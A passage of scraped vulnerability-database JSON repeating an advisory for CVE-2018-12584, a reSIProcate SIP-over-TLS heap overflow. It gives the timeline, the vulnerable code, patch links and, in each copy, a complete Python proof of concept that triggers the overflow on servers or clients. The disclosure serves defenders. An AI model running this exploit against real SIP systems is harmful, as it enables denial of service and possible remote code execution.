\"SIP/2.0 200 OK\\x0d\\x0aVia: SIP/2.0/TLS\n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom:\n<sip:\" + username + \"@\" + via +\n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via\n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2\nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" %\nbuffer_length + \"\\x0d\\x0aSIP-ETag:\naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\"\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\n connection.send(content_length_packet.encode())\n cseq = cseq + 1\n connection.send(oversized_packet.encode())\n connection.shutdown(SHUT_RDWR)\n connection.close()\n\ndef test_clients():\n global server_ip, keyfile, certfile\n server_socket=socket(AF_INET, SOCK_STREAM)\n server_socket.bind((server_ip, 5061))\n server_socket.listen(1)\n tls_server = wrap_socket(server_socket,\nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True,\nkeyfile=keyfile, certfile=certfile)\n print(\"Server running!\")\n done = False\n while not done:\n connection, client_address= tls_server.accept()\n print(\"Connection from \" + client_address[0] + \":%d\" %\nclient_address[1])\n data_in = connection.recv(1024)\n if not data_in:\n done = True\n break\n message = data_in.decode()\n if \"SUBSCRIBE\" in message:\n print(\"Client sent SUBSCRIBE request\")\n trigger_client_heap_overflow(connection)\n\ndef test_server():\n global server, port\n context = create_default_context()\n context.check_hostname = False\n context.verify_mode = CERT_NONE\n tls_client = context.wrap_socket(socket(AF_INET), server_hostname=server)\n tls_client.connect((server, port))\n print(\"Connected!\")\n trigger_server_heap_overflow(tls_client)\n tls_client.shutdown(SHUT_RDWR)\n tls_client.close()\n\ndef main():\n global daemon_mode\n if daemon_mode:\n test_clients()\n else:\n test_server()\n\nif __name__ == \"__main__\":\n main()\n\n'''\nEXPLOITABILITY\n\nAt http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html\nthe exploitability of an affected version of repro on Windows XP Professional\nwith Service Pack 3 was examined, it was separated from this text because AVG\nWeb Shield considered the text to be a threat. Arbitrary code execution has\nproven to be possible and may be possible on other operating systems and\nsoftware based on affected versions of reSIProcate as well.\n\nSOLUTION\n\nA patch was created by Scott Godin, it was committed to the reSIProcate\nrepository at\n\nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608\n\nThe following software based on reSIProcate contains a fix for the issue:\n\n3CX Phone System 15.5.13470.6 and higher\n\nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in\nresiprocate package version 1:1.9.7-5+deb8u1\n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)\n\nDISCLAIMER\n\nThe information in this report is believed to be accurate at the time of\npublishing based on currently available information.\nUse of the information constitutes acceptance for use in an AS IS condition.\nThere are no warranties with regard to this information. Neither the author\nnor the publisher accepts any liability for any direct, indirect, or\nconsequential loss or damage arising from use of, or reliance on, this\ninformation.\n'''", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-08-09T09:58:49", "description": "", "cvss3": {}, "published": "2018-08-08T00:00:00", "type": "packetstorm", "title": "reSIProcate 1.10.2 Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-08T00:00:00", "id": "PACKETSTORM:148856", "href": "https://packetstormsecurity.com/files/148856/reSIProcate-1.10.2-Heap-Overflow.html", "sourceData": "`CVE ID: CVE-2018-12584 \n \nTIMELINE \n \nBug report with test code sent to main reSIProcate developers: 2018-06-15 \nPatch created by Scott Godin: 2018-06-18 \nCVE ID assigned: 2018-06-19 \nPatch committed to reSIProcate repository: 2018-06-21 \nAdvisory first published on website: 2018-06-22 \nAdvisory sent to Bugtraq mailing list: 2018-08-08 \n \nDESCRIPTION \n \nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is \nenabled. \nAbuse of this vulnerability may cause a denial of service of software using \nreSIProcate and may also lead to remote code execution. \nNo SIP user authentication is required to trigger the vulnerability on the \nclient or server side. \n \nTECHNICAL DETAILS \n \nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following \ncode fragment: \n \nbool \nConnectionBase::preparseNewBytes(int bytesRead) \n{ \n/* ... */ \nelse if (mBufferPos == mBufferSize) \n{ \n// .bwc. We've filled our buffer; go ahead and make more room. \nsize_t newSize = resipMin(mBufferSize*3/2, contentLength); \nchar* newBuffer = 0; \ntry \n{ \nnewBuffer=new char[newSize]; \n} \ncatch(std::bad_alloc&) \n{ \nErrLog(>>\"Failed to alloc a buffer while receiving body!\"); \nreturn false; \n} \nmemcpy(newBuffer, mBuffer, mBufferSize); \nmBufferSize=newSize; \ndelete [] mBuffer; \nmBuffer = newBuffer; \n} \n/* ... */ \n} \n \nExecution of the code above could be triggered by sending a partial SIP \nmessage over TLS with a Content-Length header field, followed by sending a \npacket over TLS with its associated SIP message body. By setting the \nContent-Length field to a value that is lower than the length of the SIP \nmessage body which followed, a malicious user could trigger a heap buffer \noverflow. \n \nThe bug did not appear to be reproducible using TCP instead of TLS even when \nthe TCP packets were sent with delays between them. \n \nTEST CODE \n \nThe following Python script can be used to test the vulnerability of both \nserver and client software based on reSIProcate. \n \n#!/usr/bin/python3 \n \n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code \n# Written by Joachim De Zutter (2018) \n \nfrom socket import * \nfrom ssl import * # pip install pyopenssl \n \ndaemon_mode = False \n \n# server to test (in case daemon_mode = False) \nserver = \"\" \nport = 5061 \n \n# server configuration (in case daemon_mode = True) \nserver_ip = \"xxx.xxx.xxx.xxx\" \nkeyfile = \"keyfile.pem\" \ncertfile = \"certfile.pem\" \n \nusername = \"test\" \nvia = \"192.168.13.37:31337\" \ncallid = \"LtCwMvc2C5tca58a5Ridwg..\" \ncseq = 1 \n \ndef trigger_server_heap_overflow(connection): \nglobal username, server, via, cseq \nprint(\"Triggering heap overflow!\") \nbuffer_length = 100 \nregister_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia: \nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via \n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server + \n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server + \n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires: \n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\" \noversized_packet = buffer_length * \"A\" + 64 * \"B\" \nconnection.send(register_packet.encode()) \ncseq = cseq + 1 \nconnection.send(oversized_packet.encode()) \n \ndef trigger_client_heap_overflow(connection): \nglobal username, via, callid, cseq \nprint(\"Triggering heap overflow!\") \nbuffer_length = 100 \ncontent_length_packet = \"SIP/2.0 200 OK\\x0d\\x0aVia: SIP/2.0/TLS \n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom: \n<sip:\" + username + \"@\" + via + \n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via \n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2 \nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" % \nbuffer_length + \"\\x0d\\x0aSIP-ETag: \naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\" \noversized_packet = buffer_length * \"A\" + 64 * \"B\" \nconnection.send(content_length_packet.encode()) \ncseq = cseq + 1 \nconnection.send(oversized_packet.encode()) \nconnection.shutdown(SHUT_RDWR) \nconnection.close() \n \ndef test_clients(): \nglobal server_ip, keyfile, certfile \nserver_socket=socket(AF_INET, SOCK_STREAM) \nserver_socket.bind((server_ip, 5061)) \nserver_socket.listen(1) \ntls_server = wrap_socket(server_socket, \nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True, \nkeyfile=keyfile, certfile=certfile) \nprint(\"Server running!\") \ndone = False \nwhile not done: \nconnection, client_address= tls_server.accept() \nprint(\"Connection from \" + client_address[0] + \":%d\" % \nclient_address[1]) \ndata_in = connection.recv(1024) \nif not data_in: \ndone = True \nbreak \nmessage = data_in.decode() \nif \"SUBSCRIBE\" in message: \nprint(\"Client sent SUBSCRIBE request\") \ntrigger_client_heap_overflow(connection) \n \ndef test_server(): \nglobal server, port \ncontext = create_default_context() \ncontext.check_hostname = False \ncontext.verify_mode = CERT_NONE \ntls_client = context.wrap_socket(socket(AF_INET), server_hostname=server) \ntls_client.connect((server, port)) \nprint(\"Connected!\") \ntrigger_server_heap_overflow(tls_client) \ntls_client.shutdown(SHUT_RDWR) \ntls_client.close() \n \ndef main(): \nglobal daemon_mode \nif daemon_mode: \ntest_clients() \nelse: \ntest_server() \n \nif __name__ == \"__main__\": \nmain() \n \nEXPLOITABILITY \n \nAt http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html \nthe exploitability of an affected version of repro on Windows XP Professional \nwith Service Pack 3 was examined, it was separated from this text because AVG \nWeb Shield considered the text to be a threat. Arbitrary code execution has \nproven to be possible and may be possible on other operating systems and \nsoftware based on affected versions of reSIProcate as well. \n \nSOLUTION \n \nA patch was created by Scott Godin, it was committed to the reSIProcate \nrepository at \n \nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608 \n \nThe following software based on reSIProcate contains a fix for the issue: \n \n3CX Phone System 15.5.13470.6 and higher \n \nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in \nresiprocate package version 1:1.9.7-5+deb8u1 \n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html) \n \nDISCLAIMER \n \nThe information in this report is believed to be accurate at the time of \npublishing based on currently available information. \nUse of the information constitutes acceptance for use in an AS IS condition. \nThere are no warranties with regard to this information. Neither the author \nnor the publisher accepts any liability for any direct, indirect, or \nconsequential loss or damage arising from use of, or reliance on, this \ninformation. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148856/resiprocate-overflow.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-16T06:13:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-09T00:00:00", "type": "exploitdb", "title": "reSIProcate 1.10.2 - Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-12584", "CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-09T00:00:00", "id": "EDB-ID:45174", "href": "https://www.exploit-db.com/exploits/45174", "sourceData": "'''\r\nCVE ID: CVE-2018-12584\r\n\r\nTIMELINE\r\n\r\n Bug report with test code sent to main reSIProcate developers: 2018-06-15\r\n Patch created by Scott Godin: 2018-06-18\r\n CVE ID assigned: 2018-06-19\r\n Patch committed to reSIProcate repository: 2018-06-21\r\n Advisory first published on website: 2018-06-22\r\n Advisory sent to Bugtraq mailing list: 2018-08-08\r\n\r\nDESCRIPTION\r\n\r\nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is\r\nenabled.\r\nAbuse of this vulnerability may cause a denial of service of software using\r\nreSIProcate and may also lead to remote code execution.\r\nNo SIP user authentication is required to trigger the vulnerability on the\r\nclient or server side.\r\n\r\nTECHNICAL DETAILS\r\n\r\nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following\r\ncode fragment:\r\n\r\nbool\r\nConnectionBase::preparseNewBytes(int bytesRead)\r\n{\r\n/* ... */\r\n else if (mBufferPos == mBufferSize)\r\n {\r\n // .bwc. We've filled our buffer; go ahead and make more room.\r\n size_t newSize = resipMin(mBufferSize*3/2, contentLength);\r\n char* newBuffer = 0;\r\n try\r\n {\r\n newBuffer=new char[newSize];\r\n }\r\n catch(std::bad_alloc&)\r\n {\r\n ErrLog(>>\"Failed to alloc a buffer while receiving body!\");\r\n return false;\r\n }\r\n memcpy(newBuffer, mBuffer, mBufferSize);\r\n mBufferSize=newSize;\r\n delete [] mBuffer;\r\n mBuffer = newBuffer;\r\n }\r\n/* ... */\r\n}\r\n\r\nExecution of the code above could be triggered by sending a partial SIP\r\nmessage over TLS with a Content-Length header field, followed by sending a\r\npacket over TLS with its associated SIP message body. By setting the\r\nContent-Length field to a value that is lower than the length of the SIP\r\nmessage body which followed, a malicious user could trigger a heap buffer\r\noverflow.\r\n\r\nThe bug did not appear to be reproducible using TCP instead of TLS even when\r\nthe TCP packets were sent with delays between them.\r\n\r\nTEST CODE\r\n\r\nThe following Python script can be used to test the vulnerability of both\r\nserver and client software based on reSIProcate.\r\n'''\r\n\r\n#!/usr/bin/python3\r\n\r\n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code\r\n# Written by Joachim De Zutter (2018)\r\n\r\nfrom socket import *\r\nfrom ssl import * # pip install pyopenssl\r\n\r\ndaemon_mode = False\r\n\r\n# server to test (in case daemon_mode = False)\r\nserver = \"\"\r\nport = 5061\r\n\r\n# server configuration (in case daemon_mode = True)\r\nserver_ip = \"xxx.xxx.xxx.xxx\"\r\nkeyfile = \"keyfile.pem\"\r\ncertfile = \"certfile.pem\"\r\n\r\nusername = \"test\"\r\nvia = \"192.168.13.37:31337\"\r\ncallid = \"LtCwMvc2C5tca58a5Ridwg..\"\r\ncseq = 1\r\n\r\ndef trigger_server_heap_overflow(connection):\r\n global username, server, via, cseq\r\n print(\"Triggering heap overflow!\")\r\n buffer_length = 100\r\n register_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia:\r\nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via\r\n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server +\r\n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server +\r\n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires:\r\n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\"\r\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\r\n connection.send(register_packet.encode())\r\n cseq = cseq + 1\r\n connection.send(oversized_packet.encode())\r\n\r\ndef trigger_client_heap_overflow(connection):\r\n global username, via, callid, cseq\r\n print(\"Triggering heap overflow!\")\r\n buffer_length = 100\r\n content_length_packet = \"SIP/2.0 200 OK\\x0d\\x0aVia: SIP/2.0/TLS\r\n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom:\r\n<sip:\" + username + \"@\" + via +\r\n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via\r\n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2\r\nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" %\r\nbuffer_length + \"\\x0d\\x0aSIP-ETag:\r\naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\"\r\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\r\n connection.send(content_length_packet.encode())\r\n cseq = cseq + 1\r\n connection.send(oversized_packet.encode())\r\n connection.shutdown(SHUT_RDWR)\r\n connection.close()\r\n\r\ndef test_clients():\r\n global server_ip, keyfile, certfile\r\n server_socket=socket(AF_INET, SOCK_STREAM)\r\n server_socket.bind((server_ip, 5061))\r\n server_socket.listen(1)\r\n tls_server = wrap_socket(server_socket,\r\nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True,\r\nkeyfile=keyfile, certfile=certfile)\r\n print(\"Server running!\")\r\n done = False\r\n while not done:\r\n connection, client_address= tls_server.accept()\r\n print(\"Connection from \" + client_address[0] + \":%d\" %\r\nclient_address[1])\r\n data_in = connection.recv(1024)\r\n if not data_in:\r\n done = True\r\n break\r\n message = data_in.decode()\r\n if \"SUBSCRIBE\" in message:\r\n print(\"Client sent SUBSCRIBE request\")\r\n trigger_client_heap_overflow(connection)\r\n\r\ndef test_server():\r\n global server, port\r\n context = create_default_context()\r\n context.check_hostname = False\r\n context.verify_mode = CERT_NONE\r\n tls_client = context.wrap_socket(socket(AF_INET), server_hostname=server)\r\n tls_client.connect((server, port))\r\n print(\"Connected!\")\r\n trigger_server_heap_overflow(tls_client)\r\n tls_client.shutdown(SHUT_RDWR)\r\n tls_client.close()\r\n\r\ndef main():\r\n global daemon_mode\r\n if daemon_mode:\r\n test_clients()\r\n else:\r\n test_server()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n'''\r\nEXPLOITABILITY\r\n\r\nAt http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html\r\nthe exploitability of an affected version of repro on Windows XP Professional\r\nwith Service Pack 3 was examined, it was separated from this text because AVG\r\nWeb Shield considered the text to be a threat. Arbitrary code execution has\r\nproven to be possible and may be possible on other operating systems and\r\nsoftware based on affected versions of reSIProcate as well.\r\n\r\nSOLUTION\r\n\r\nA patch was created by Scott Godin, it was committed to the reSIProcate\r\nrepository at\r\n\r\nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608\r\n\r\nThe following software based on reSIProcate contains a fix for the issue:\r\n\r\n3CX Phone System 15.5.13470.6 and higher\r\n\r\nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in\r\nresiprocate package version 1:1.9.7-5+deb8u1\r\n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)\r\n\r\nDISCLAIMER\r\n\r\nThe information in this report is believed to be accurate at the time of\r\npublishing based on currently available information.\r\nUse of the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the author\r\nnor the publisher accepts any liability for any direct, indirect, or\r\nconsequential loss or damage arising from use of, or reliance on, this\r\ninformation.\r\n'''", "sourceHref": "https://www.exploit-db.com/download/45174", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
[SECURITY] [DLA 1040-1] resiprocate security update
